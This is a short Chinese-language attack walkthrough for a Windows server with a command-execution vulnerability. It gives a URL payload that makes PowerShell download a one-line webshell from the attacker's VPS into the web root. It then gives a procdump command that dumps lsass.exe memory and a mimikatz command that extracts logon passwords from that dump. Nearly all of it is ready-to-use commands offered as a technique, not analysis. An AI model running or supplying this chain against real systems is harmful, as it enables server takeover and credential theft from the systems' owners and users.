前提:
存在命令执行的windows服务器
利用:
1,将一句话木马上传到自己的vps上,通过命令执行漏洞,执行命令将一句话木马下载到服务器当中(需要知道绝对路径)
http://url?pwd=zs&cmd=cmd+/c+powershell+(new-object System.Net.WebClient).DownloadFile('http://vps/shell.txt','C:/绝对路径/shy.jsp')
2,使用菜刀进行连接,上传procdump64.exe抓取lsass.exe进程
./procdump64.exe -accepteula -ma lsass.exe lsass.dmp
3,将抓取到的lsass.dmp拷贝到本地,在本地使用mimikatz抓取明文
mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" exit
看只要密码强度够,就抓不到明文,就不上图了。